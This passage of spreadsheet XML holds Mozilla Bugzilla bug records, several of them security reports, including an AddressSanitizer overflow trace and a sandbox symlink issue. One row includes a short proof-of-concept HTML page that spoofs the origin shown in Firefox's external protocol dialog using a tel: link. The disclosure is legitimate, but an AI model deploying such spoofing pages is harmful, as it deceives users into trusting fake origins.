          <t>Graphics</t>
        </is>
      </c>
      <c r="K2853" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2853" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2853" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2853" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2853" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2853" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q2853" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2853" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2853" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2853" t="n">
        <v>1</v>
      </c>
      <c r="U2853" t="n">
        <v>0</v>
      </c>
      <c r="V2853" t="n">
        <v>19</v>
      </c>
      <c r="W2853" t="inlineStr">
        <is>
          <t>http://hg.mozilla.org/mozilla-central/file/a7346f028fd6/gfx/thebes/gfxGDIFontList.cpp#l629
lenAlias is passed to RegEnumValueW to specify the length of aliasName. RegEnumValueW expects the length in characters, not bytes AIUI, so using sizeof makes us say the buffer is twice as big as it actually is.
From MSDN http://msdn.microsoft.com/en-us/library/ms724865%28v=vs.85%29.aspx :
lpcchValueName [in, out]
    A pointer to a variable that specifies the size of the buffer pointed to by the lpValueName parameter, in characters.
Not sure if overrunning this buffer is an actual security problem so I'm marking it as one.</t>
        </is>
      </c>
      <c r="X2853" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2854">
      <c r="A2854" t="n">
        <v>135895</v>
      </c>
      <c r="B2854" t="inlineStr">
        <is>
          <t>2002-04-05 23:23:19 -0800</t>
        </is>
      </c>
      <c r="C2854" t="inlineStr">
        <is>
          <t>XHTML &lt;style&gt; element not working</t>
        </is>
      </c>
      <c r="D2854" t="inlineStr">
        <is>
          <t>2002-05-22 12:42:02 -0700</t>
        </is>
      </c>
      <c r="E2854" t="n">
        <v>1</v>
      </c>
      <c r="F2854" t="n">
        <v>1</v>
      </c>
      <c r="G2854" t="n">
        <v>3</v>
      </c>
      <c r="H2854" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2854" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2854" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K2854" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2854" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2854" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2854" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2854" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2854" t="inlineStr">
        <is>
          <t>[fixed on trunk][Hixie-P1][Hixie-1.0][ADT1] affects W3C Selectors test suite</t>
        </is>
      </c>
      <c r="Q2854" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2854" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2854" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T2854" t="n">
        <v>1</v>
      </c>
      <c r="U2854" t="n">
        <v>0</v>
      </c>
      <c r="V2854" t="n">
        <v>27</v>
      </c>
      <c r="W2854" t="inlineStr">
        <is>
          <t>In the build as of the 3rd, attachment 75083 was showing up with lots of style.
 Today the styles specified in the page seem to not show up at all.  The only
thing "out of the ordinary" on this page is that it is XHTML Strict.</t>
        </is>
      </c>
      <c r="X2854" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2855">
      <c r="A2855" t="n">
        <v>1636654</v>
      </c>
      <c r="B2855" t="inlineStr">
        <is>
          <t>2020-05-08 21:51:44 -0700</t>
        </is>
      </c>
      <c r="C2855" t="inlineStr">
        <is>
          <t>External Protocol / scheme handler dialog can be spawned from background tabs leading to spoofing of the origin of the link that's opening</t>
        </is>
      </c>
      <c r="D2855" t="inlineStr">
        <is>
          <t>2024-05-30 10:14:15 -0700</t>
        </is>
      </c>
      <c r="E2855" t="n">
        <v>1</v>
      </c>
      <c r="F2855" t="n">
        <v>1</v>
      </c>
      <c r="G2855" t="n">
        <v>2</v>
      </c>
      <c r="H2855" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2855" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2855" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2855" t="inlineStr">
        <is>
          <t>76 Branch</t>
        </is>
      </c>
      <c r="L2855" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2855" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2855" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2855" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2855" t="inlineStr">
        <is>
          <t>[fixed by Bug 1661030][post-critsmash-triage][adv-main82+]</t>
        </is>
      </c>
      <c r="Q2855" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2855" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2855" t="inlineStr">
        <is>
          <t>82 Branch</t>
        </is>
      </c>
      <c r="T2855" t="n">
        <v>1</v>
      </c>
      <c r="U2855" t="n">
        <v>0</v>
      </c>
      <c r="V2855" t="n">
        <v>17</v>
      </c>
      <c r="W2855" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Steps to reproduce:
Please visit the link https://sites.google.com/view/lijocheck/home
there have two button one have set time out 40, another set timeout 4000 
if click button 40 s launch application will popup on about:blank it will not load contact form of apple
if click button 4000 s launch application will popup on https://www.apple.com/contact/ and user think its from https://www.apple.com/contact/ will contact them with given number
Actual results:
launch application window opened in spoof url it must open on about blank url.
Expected results:
launch application window must open on about blank url. 
html 
&lt;html&gt;
    &lt;head&gt;
        &lt;title&gt;Tel Check&lt;/title&gt;
    &lt;/head&gt;
    &lt;body&gt;
        &lt;li&gt;click button 40 s &lt;button onclick="pwn40()"&gt;clickme&lt;/button&gt; &lt;/li&gt;
&lt;li&gt;click button 4000 s &lt;button onclick="pwn4000()"&gt;clickme&lt;/button&gt; &lt;/li&gt;
        &lt;br&gt;
        &lt;script&gt;
var pwn40 = () =&gt; {
                win = window.open("https://www.apple.com/contact/ ", "test", "width=800 height=800");
                setTimeout("win.location = 'tel:tel:+919747 '", 40);
            }
var pwn4000 = () =&gt; {
                win = window.open("https://www.apple.com/contact/ ", "test", "width=400 height=400");
                setTimeout("win.location = 'tel:+919747 '", 400);
            }
        &lt;/script&gt;
    &lt;/body&gt;
    &lt;/html&gt;
Serve it on a wb server</t>
        </is>
      </c>
      <c r="X2855" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2856">
      <c r="A2856" t="n">
        <v>643967</v>
      </c>
      <c r="B2856" t="inlineStr">
        <is>
          <t>2011-03-22 15:57:41 -0700</t>
        </is>
      </c>
      <c r="C2856" t="inlineStr">
        <is>
          <t>js_CloneScript does not preserve principals for nested functions</t>
        </is>
      </c>
      <c r="D2856" t="inlineStr">
        <is>
          <t>2013-03-18 11:16:14 -0700</t>
        </is>
      </c>
      <c r="E2856" t="n">
        <v>1</v>
      </c>
      <c r="F2856" t="n">
        <v>1</v>
      </c>
      <c r="G2856" t="n">
        <v>3</v>
      </c>
      <c r="H2856" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2856" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2856" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2856" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2856" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2856" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2856" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2856" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2856" t="inlineStr">
        <is>
          <t>[advisory-tracking+][sg:critical] [fixed by 725576 &amp; 739808]</t>
        </is>
      </c>
      <c r="Q2856" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2856" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2856" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2856" t="n">
        <v>1</v>
      </c>
      <c r="U2856" t="n">
        <v>0</v>
      </c>
      <c r="V2856" t="n">
        <v>60</v>
      </c>
      <c r="W2856" t="inlineStr">
        <is>
          <t>js_CloneScript that was introduced in the bug 584789 only preserves the principals for the script itself and keeps the principals for all nested functions and their scripts set to null.</t>
        </is>
      </c>
      <c r="X2856" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2857">
      <c r="A2857" t="n">
        <v>801366</v>
      </c>
      <c r="B2857" t="inlineStr">
        <is>
          <t>2012-10-13 23:02:01 -0700</t>
        </is>
      </c>
      <c r="C2857" t="inlineStr">
        <is>
          <t>out-of-bounds-read in mozilla::image::RasterImage::DrawFrameTo</t>
        </is>
      </c>
      <c r="D2857" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:57 -0700</t>
        </is>
      </c>
      <c r="E2857" t="n">
        <v>1</v>
      </c>
      <c r="F2857" t="n">
        <v>1</v>
      </c>
      <c r="G2857" t="n">
        <v>3</v>
      </c>
      <c r="H2857" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2857" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2857" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K2857" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2857" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2857" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2857" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2857" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2857" t="inlineStr">
        <is>
          <t>[asan][adv-main19+]</t>
        </is>
      </c>
      <c r="Q2857" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2857" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2857" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T2857" t="n">
        <v>1</v>
      </c>
      <c r="U2857" t="n">
        <v>0</v>
      </c>
      <c r="V2857" t="n">
        <v>34</v>
      </c>
      <c r="W2857" t="inlineStr">
        <is>
          <t>Created attachment 671183
Repro-file
The ASAN-report from this bug looks almost identical to https://bugzilla.mozilla.org/show_bug.cgi?id=758200 which should be fixed. I also tried the repro-files from the earlier bug but those don't cause crash anymore.
Tested with build from https://people.mozilla.com/~choller/firefox/asan/20121013-mozilla-central-linux64-debug-0be7bfea4744+asan.html
To reproduce open the attached gif-image with ASAN built Firefox didn't affect Firefox 16.0.1 official-build. 
ASAN-report: 
==11528== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f43552f8bbc at pc 0x7f4375acb440 bp 0x7fffc641a070 sp 0x7fffc641a068
READ of size 4 at 0x7f43552f8bbc thread T0
    #0 0x7f4375acb43f in mozilla::image::RasterImage::DrawFrameTo(imgFrame*, imgFrame*, nsIntRect&amp;) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:2173
    #1 0x7f4375ac0fa7 in mozilla::image::RasterImage::DoComposite(nsIntRect*, imgFrame*, imgFrame*, int) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:1979
    #2 0x7f4375abfcc4 in mozilla::image::RasterImage::AdvanceFrame(mozilla::TimeStamp, nsIntRect*) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:442
    #3 0x7f4375ac166b in mozilla::image::RasterImage::RequestRefresh(mozilla::TimeStamp const&amp;) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:485
    #4 0x7f4375ce774c in nsRefreshDriver::ImageRequestEnumerator(nsISupportsHashKey*, void*) /builds/slave/try-lnx64-dbg/build/layout/base/nsRefreshDriver.cpp:469
    #5 0x7f4377f204a3 in PL_DHashTableEnumerate /builds/slave/try-lnx64-dbg/build/obj-firefox/xpcom/build/pldhash.cpp:716
    #6 0x7f4375ce756c in nsTHashtable&lt;nsISupportsHashKey&gt;::EnumerateEntries(PLDHashOperator (*)(nsISupportsHashKey*, void*), void*) /builds/slave/try-lnx64-dbg/build/../../dist/include/nsTHashtable.h:237
    #7 0x7f4375ce622f in nsRefreshDriver::Notify(nsITimer*) /builds/slave/try-lnx64-dbg/build/layout/base/nsRefreshDriver.cpp:417
    #8 0x7f4377fd97e7 in nsTimerImpl::Fire() /builds/slave/try-lnx64-dbg/build/xpcom/threads/nsTimerImpl.cpp:475
    #9 0x7f4377fda1ae in nsTimerEvent::Run() /builds/slave/try-lnx64-dbg/build/xpcom/threads/nsTimerImpl.cpp:555
    #10 0x7f4377fcd22b in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/try-lnx64-dbg/build/xpcom/threads/nsThread.cpp:612
    #11 0x7f4377f1ba12 in NS_ProcessNextEvent_P(nsIThread*, bool) /builds/slave/try-lnx64-dbg/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:220
    #12 0x7f4377b6442b in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/try-lnx64-dbg/build/ipc/glue/MessagePump.cpp:82
    #13 0x7f437805a851 in MessageLoop::RunInternal() /builds/slave/try-lnx64-dbg/build/ipc/chromium/src/base/message_loop.cc:215
    #14 0x7f437805a74e in MessageLoop::Run() /builds/slave/try-lnx64-dbg/build/ipc/chromium/src/base/message_loop.cc:182
    #15 0x7f43778fcd31 in nsBaseAppShell::Run() /builds/slave/try-lnx64-dbg/build/widget/xpwidgets/nsBaseAppShell.cpp:163
    #16 0x7f43774a3df0 in nsAppStartup::Run() /builds/slave/try-lnx64-dbg/build/toolkit/components/startup/nsAppStartup.cpp:290
    #17 0x7f4375544084 in XREMain::XRE_mainRun() /builds/slave/try-lnx64-dbg/build/toolkit/xre/nsAppRunner.cpp:3792
    #18 0x7f437554516d in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/try-lnx64-dbg/build/toolkit/xre/nsAppRunner.cpp:3858
    #19 0x7f4375545b21 in XRE_main /builds/slave/try-lnx64-dbg/build/toolkit/xre/nsAppRunner.cpp:3933
    #20 0x409943 in do_main(int, char**) /builds/slave/try-lnx64-dbg/build/browser/app/nsBrowserApp.cpp:174
    #21 0x409127 in main /builds/slave/try-lnx64-dbg/build/browser/app/nsBrowserApp.cpp:279
    #22 0x7f4380c0376c in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:226
0x7f43552f8bbc is located 27 bytes to the right of 33-byte region [0x7f43552f8b80,0x7f43552f8ba1)
allocated by thread T0 here:
    #0 0x4354c0 in __interceptor_malloc ??:0
    #1 0x7f4375ae3adb in imgFrame::Init(int, int, int, int, gfxASurface::gfxImageFormat, unsigned char) /builds/slave/try-lnx64-dbg/build/image/src/imgFrame.cpp:169
    #2 0x7f4375ac6afe in mozilla::image::RasterImage::InternalAddFrame(unsigned int, int, int, int, int, gfxASurface::gfxImageFormat, unsigned char, unsigned char**, unsigned int*, unsigned int**, unsigned int*) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:1110
    #3 0x7f4375ac73dd in mozilla::image::RasterImage::EnsureFrame(unsigned int, int, int, int, int, gfxASurface::gfxImageFormat, unsigned char, unsigned char**, unsigned int*, unsigned int**, unsigned int*) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:1232
    #4 0x7f4375b2381f in mozilla::image::nsGIFDecoder2::BeginImageFrame(unsigned short) /builds/slave/try-lnx64-dbg/build/image/decoders/nsGIFDecoder2.cpp:185
    #5 0x7f4375b27c1f in mozilla::image::nsGIFDecoder2::WriteInternal(char const*, unsigned int) /builds/slave/try-lnx64-dbg/build/image/decoders/nsGIFDecoder2.cpp:956
    #6 0x7f4375ac902d in mozilla::image::RasterImage::WriteToDecoder(char const*, unsigned int) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:2478
    #7 0x7f4375acfdc6 in mozilla::image::RasterImage::DecodeSomeData(unsigned int) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:3086
    #8 0x7f4375ad06f2 in mozilla::image::RasterImage::DecodeWorker::DecodeSomeOfImage(mozilla::image::RasterImage*, mozilla::image::RasterImage::DecodeWorker::DecodeType) /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:3398
    #9 0x7f4375ac9446 in mozilla::image::RasterImage::SourceDataComplete() /builds/slave/try-lnx64-dbg/build/image/src/RasterImage.cpp:1672
    #10 0x7f4375b05e96 in imgRequest::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/try-lnx64-dbg/build/image/src/imgRequest.cpp:582
    #11 0x7f437661a231 in mozilla::dom::MediaDocumentStreamListener::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/try-lnx64-dbg/build/content/html/document/src/MediaDocument.cpp:67
    #12 0x7f4377378616 in nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/try-lnx64-dbg/build/uriloader/base/nsURILoader.cpp:293
    #13 0x7f4375593ce1 in nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/try-lnx64-dbg/build/netwerk/base/src/nsBaseChannel.cpp:757
    #14 0x7f4375593dfc in non-virtual thunk to nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/try-lnx64-dbg/build/media/libvpx/vp8/encoder/x86/quantize_mmx.asm:0
    #15 0x7f43755ba214 in nsInputStreamPump::OnStateStop() /builds/slave/try-lnx64-dbg/build/netwerk/base/src/nsInputStreamPump.cpp:552
    #16 0x7f43755b8ea7 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/slave/try-lnx64-dbg/build/netwerk/base/src/nsInputStreamPump.cpp:374
    #17 0x7f4377f9802d in nsInputStreamReadyEvent::Run() /builds/slave/try-lnx64-dbg/build/xpcom/io/nsStreamUtils.cpp:82
    #18 0x7f4377fcd22b in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/try-lnx64-dbg/build/xpcom/threads/nsThread.cpp:612
    #19 0x7f4377f1ba12 in NS_ProcessNextEvent_P(nsIThread*, bool) /builds/slave/try-lnx64-dbg/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:220
    #20 0x7f4377b6442b in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/try-lnx64-dbg/build/ipc/glue/MessagePump.cpp:82
    #21 0x7f437805a851 in MessageLoop::RunInternal() /builds/slave/try-lnx64-dbg/build/ipc/chromium/src/base/message_loop.cc:215
    #22 0x7f437805a74e in MessageLoop::Run() /builds/slave/try-lnx64-dbg/build/ipc/chromium/src/base/message_loop.cc:182
    #23 0x7f43778fcd31 in nsBaseAppShell::Run() /builds/slave/try-lnx64-dbg/build/widget/xpwidgets/nsBaseAppShell.cpp:163
    #24 0x7f43774a3df0 in nsAppStartup::Run() /builds/slave/try-lnx64-dbg/build/toolkit/components/startup/nsAppStartup.cpp:290
Shadow byte and word:
  0x1fe86aa5f177: fb
  0x1fe86aa5f170: 00 00 00 00 01 fb fb fb
More shadow bytes:
  0x1fe86aa5f150: 00 00 00 00 00 00 00 00
  0x1fe86aa5f158: 00 00 00 00 00 00 fb fb
  0x1fe86aa5f160: fa fa fa fa fa fa fa fa
  0x1fe86aa5f168: fa fa fa fa fa fa fa fa
=&gt;0x1fe86aa5f170: 00 00 00 00 01 fb fb fb
  0x1fe86aa5f178: fb fb fb fb fb fb fb fb
  0x1fe86aa5f180: fa fa fa fa fa fa fa fa
  0x1fe86aa5f188: fa fa fa fa fa fa fa fa
  0x1fe86aa5f190: 00 00 00 00 00 00 00 00
Stats: 225M malloced (243M for red zones) by 348346 calls
Stats: 33M realloced by 21083 calls
Stats: 197M freed by 224732 calls
Stats: 63M really freed by 132000 calls
Stats: 448M (114771 full pages) mmaped in 112 calls
  mmaps   by size class: 8:245745; 9:32764; 10:16380; 11:12282; 12:3072; 13:1536; 14:1280; 15:256; 16:512; 17:1280; 18:192; 19:40; 20:20;
  mallocs by size class: 8:274234; 9:34150; 10:18865; 11:12880; 12:2580; 13:1750; 14:1449; 15:269; 16:634; 17:1280; 18:198; 19:37; 20:20;
  frees   by size class: 8:170193; 9:23848; 10:14205; 11:9794; 12:1575; 13:1564; 14:1294; 15:223; 16:565; 17:1267; 18:150; 19:36; 20:18;
  rfrees  by size class: 8:108284; 9:8216; 10:7581; 11:5595; 12:528; 13:477; 14:478; 15:100; 16:346; 17:384; 18:6; 19:4; 20:1;
Stats: malloc large: 1535 small slow: 1841
==11528== ABORTING</t>
        </is>
      </c>
      <c r="X2857" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2858">
      <c r="A2858" t="n">
        <v>66154</v>
      </c>
      <c r="B2858" t="inlineStr">
        <is>
          <t>2001-01-21 16:19:40 -0800</t>
        </is>
      </c>
      <c r="C2858" t="inlineStr">
        <is>
          <t>syntax error in reports.cgi</t>
        </is>
      </c>
      <c r="D2858" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:23 -0800</t>
        </is>
      </c>
      <c r="E2858" t="n">
        <v>1</v>
      </c>
      <c r="F2858" t="n">
        <v>1</v>
      </c>
      <c r="G2858" t="n">
        <v>4</v>
      </c>
      <c r="H2858" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2858" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2858" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2858" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2858" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2858" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2858" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2858" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2858" t="inlineStr"/>
      <c r="Q2858" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2858" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2858" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T2858" t="n">
        <v>1</v>
      </c>
      <c r="U2858" t="n">
        <v>0</v>
      </c>
      <c r="V2858" t="n">
        <v>11</v>
      </c>
      <c r="W2858" t="inlineStr">
        <is>
          <t>Current CVS code has a syntax error in reports.cgi (perl -c reports.cgi
generates reports as line 43).
Kills reports.cgi.</t>
        </is>
      </c>
      <c r="X2858" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2859">
      <c r="A2859" t="n">
        <v>1379276</v>
      </c>
      <c r="B2859" t="inlineStr">
        <is>
          <t>2017-07-07 13:33:39 -0700</t>
        </is>
      </c>
      <c r="C2859" t="inlineStr">
        <is>
          <t>chrome process printing code reads path from content process without checking if it's a symlink</t>
        </is>
      </c>
      <c r="D2859" t="inlineStr">
        <is>
          <t>2018-11-05 14:10:13 -0800</t>
        </is>
      </c>
      <c r="E2859" t="n">
        <v>1</v>
      </c>
      <c r="F2859" t="n">
        <v>1</v>
      </c>
      <c r="G2859" t="n">
        <v>3</v>
      </c>
      <c r="H2859" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2859" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2859" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K2859" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2859" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2859" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2859" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2859" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2859" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage] sb+</t>
        </is>
      </c>
      <c r="Q2859" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2859" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2859" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T2859" t="n">
        <v>1</v>
      </c>
      <c r="U2859" t="n">
        <v>0</v>
      </c>
      <c r="V2859" t="n">
        <v>13</v>
      </c>
      <c r="W2859" t="inlineStr">
        <is>
          <t>https://dxr.mozilla.org/mozilla-central/source/layout/printing/ipc/RemotePrintJobParent.cpp?q=RemotePrintJobParent%3A%3APrintPage&amp;redirect_type=single#100-127
Is the relevant code, it accepts a path from the content process and then opens it up. On macOS at least, the content process can write a symlink into that directory, causing it to open an arbitrary file on disk.
It looks like the expected format of the the file is a custom binary format, so this probably can't be used to leak the full contents of arbitrary files, but it needs closer inspection: https://dxr.mozilla.org/mozilla-central/source/layout/printing/PrintTranslator.cpp?q=%2Bfunction%3A%22mozilla%3A%3Alayout%3A%3APrintTranslator%3A%3ATranslateRecording%28std%3A%3Aistream+%26%29%22&amp;redirect_type=single#28
Unfortunately I haven't found a way to use the macOS sandboxing policy language to disallow creating symlinks. I'm going to file a bug with apple requesting it. Therefore any place the chrome process opens up paths in the content process's temporary directory, it needs to validate that they aren't symlinks -- my understanding (correct if wrong!) is that printing is the only place we do this. (I wonder if we should instead generate a pipe-pair and send the content process the write end, to avoid needing to read from this path on disk in chrome).
(I put this bug in sandboxing, but maybe it belongs in printing?) I believe this should be sec-low or sec-moderate (it only really affects nightly because the sandbox doesn't prevent filesystem access directly on other release channels!)</t>
        </is>
      </c>
      <c r="X2859" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2860">
      <c r="A2860" t="n">
        <v>1127787</v>
      </c>
      <c r="B2860" t="inlineStr">
        <is>
          <t>2015-01-30 03:54:21 -0800</t>
        </is>
      </c>
      <c r="C2860" t="inlineStr">
        <is>
          <t>Use elasticsearch-py for cleanup cron job</t>
        </is>
      </c>
      <c r="D2860" t="inlineStr">
        <is>
          <t>2015-02-03 07:46:24 -0800</t>
        </is>
      </c>
      <c r="E2860" t="n">
        <v>1</v>
      </c>
      <c r="F2860" t="n">
        <v>1</v>
      </c>
      <c r="G2860" t="n">
        <v>4</v>
      </c>
      <c r="H2860" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2860" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2860" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K2860" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2860" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2860" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2860" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2860" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2860" t="inlineStr"/>
      <c r="Q2860" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2860" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2860" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2860" t="n">
        <v>1</v>
      </c>
      <c r="U2860" t="n">
        <v>0</v>
      </c>
      <c r="V2860" t="n">
        <v>5</v>
      </c>
      <c r="W2860" t="inlineStr">
        <is>
          <t>Replace pyelasticsearch with elasticsearch-py, unless it breaks compatibility with ES 0.90.</t>
        </is>
      </c>
      <c r="X2860" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2861">
      <c r="A2861" t="n">
        <v>386942</v>
      </c>
      <c r="B2861" t="inlineStr">
        <is>
          <t>2007-07-05 02:38:18 -0700</t>
        </is>
      </c>
      <c r="C2861" t="inlineStr">
        <is>
          <t>[SECURITY] User Agent text should be HTML escaped</t>
        </is>
      </c>
      <c r="D2861" t="inlineStr">
        <is>
          <t>2007-09-03 17:06:29 -0700</t>
        </is>
      </c>
      <c r="E2861" t="n">
        <v>1</v>
      </c>
      <c r="F2861" t="n">
        <v>1</v>
      </c>
      <c r="G2861" t="n">
        <v>4</v>
      </c>
      <c r="H2861" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2861" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2861" t="inlineStr">
        <is>
